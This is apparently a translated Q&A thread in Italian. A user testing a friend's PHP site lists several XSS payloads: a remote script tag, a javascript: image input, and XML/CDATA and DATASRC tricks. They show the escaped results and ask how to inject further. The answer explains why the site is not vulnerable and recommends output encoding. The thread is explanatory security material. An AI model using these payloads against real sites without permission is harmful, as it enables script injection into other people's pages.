Rispondi alla mia iniezione html?

1

Pratico l'iniezione di HTML sul sito web dei miei amici (sa che mi sto esercitando). Quindi ho trovato una vulnerabilità se digito <!----> nella casella di ricerca nome utente o password sito web ignora. e ho praticato alcuni tag nella casella di ricerca come <script>, <styles>, <link> e il sito ignora (o non so cosa faccia con loro).

Quindi ho inserito questo nella casella di ricerca <script src=[myip]/tmp.js></script> e quando l'ho fatto come query ha dato risultato Error: Please enter a query to search. e in quel file tmp.js era un alert('hey'); semplice ma il sito Web non pop hey .

Così ho provato alcune altre iniezioni da diversi siti Web e ho ottenuto questi come output (tutto nella casella di ricerca)

INPUT:    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
OUTPUT:   Results for "<input type="image" src="denied:javascript:alert('XSS');">"

2)

INPUT:   "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
OUTPUT:  Results for """"

3)

INPUT:   "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
OUTPUT:   Results for ""<span></span>""

Domanda: così è vulnerabile il sito Web posso iniettare in qualche modo javascript, o posso entrare backend in qualche modo? o dovrei iniettare qualcos'altro? (il sito web usa PHP come backend)

    
posta user5954246 21.02.2017 - 08:45
fonte

1 risposta

1

Results for ""<span></span>""

Se viene visualizzato nella pagina sottoposta a rendering, la pagina non è vulnerabile a XSS, poiché i caratteri < e > sono correttamente convertiti in escape. L'origine sarebbe simile a questa:

Results for ""&lt;span&gt;&lt;/span&gt;""

Come puoi vedere i tuoi tag HTML non finiscono come tag HTML nell'origine, quindi non è possibile inserire i tag nell'HTML.

Ora, sembra che il tuo sito abbia anche qualche risanamento sull'input. Rimuove alcuni tag e modifica l' javascript: URL. Questo non è un metodo sufficiente per la protezione contro XSS. È piuttosto difficile scrivere correttamente un filtro XSS e il più delle volte tali filtri possono essere aggirati usando una combinazione di tag e attributi.

Il modo corretto di proteggere da XSS è la codifica HTML in uscita.

    
risposta data 21.02.2017 - 09:27
fonte

Leggi altre domande sui tag